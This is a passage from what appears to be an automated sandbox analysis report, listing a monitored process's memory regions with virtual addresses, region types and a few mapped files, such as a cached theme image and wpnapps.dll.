0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3148 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 3149 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3150 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3151 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3152 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 3153 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3154 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3155 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3156 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 3157 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3158 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3159 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3160 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 3161 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3162 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3163 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3164 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 3165 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3166 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3167 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3168 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 3169 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3170 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3171 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3172 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 3173 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3174 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3175 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3176 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 3177 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3178 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3179 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3180 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 3181 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3182 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3183 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3184 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 3185 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3186 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3187 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3188 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 3189 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3190 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3191 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3192 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 3193 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3194 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3195 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3196 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 3197 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3198 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3199 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3200 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 3201 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3202 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3203 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3204 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 3205 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3206 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3207 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3208 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 3209 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3210 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3211 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3212 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 3213 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3214 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3215 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3216 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 3217 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3218 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3219 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3220 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 3221 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3222 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3223 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3224 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 3225 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3226 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3227 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3228 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 3229 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3230 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3231 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3232 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 3233 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3234 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3235 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3236 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 3237 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3238 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3239 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3240 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 3241 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3242 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3243 start_va = 0x3cf0000 end_va = 0x3d27fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cachedimage_1440_900_pos4.jpg" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\CachedFiles\\CachedImage_1440_900_POS4.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\windows\\themes\\cachedfiles\\cachedimage_1440_900_pos4.jpg") Region: id = 3244 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3245 start_va = 0x9870000 end_va = 0x9d61fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009870000" filename = "" Region: id = 3246 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 3247 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3248 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3249 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3250 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 3251 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3252 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3253 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3254 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3255 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 3256 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3257 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3258 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3259 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 3260 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3261 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3262 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3263 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 3264 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3265 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3266 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3267 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 3268 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3269 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3270 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3271 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 3272 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3273 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3274 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3275 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 3276 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3277 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3278 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3279 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 3280 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3281 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3282 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3283 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 3284 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3285 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3286 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3287 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 3288 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3289 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3290 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3291 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 3292 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3293 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3294 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3295 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 3296 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3297 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3298 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3299 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 3300 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3301 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3302 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3303 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 3304 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3305 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3306 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3307 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 3308 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3309 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3310 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3311 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 3312 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3313 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3314 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3315 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 3316 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3317 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3323 start_va = 0x7ffa0a3e0000 end_va = 0x7ffa0a482fff monitored = 0 entry_point = 0x7ffa0a3f4810 region_type = mapped_file name = "wpnapps.dll" filename = "\\Windows\\System32\\wpnapps.dll" (normalized: "c:\\windows\\system32\\wpnapps.dll") Region: id = 3324 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3325 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 3326 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3327 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3328 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3329 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3330 start_va = 0x100f0000 end_va = 0x1016ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000100f0000" filename = "" Region: id = 3331 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 3332 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3333 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3334 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3335 start_va = 0x10170000 end_va = 0x101effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010170000" filename = "" Region: id = 3336 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 3337 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3338 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3339 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3340 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 3341 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3342 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3343 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3344 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3345 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 3346 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3347 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3348 start_va = 0x10270000 end_va = 0x102effff monitored = 1 entry_point 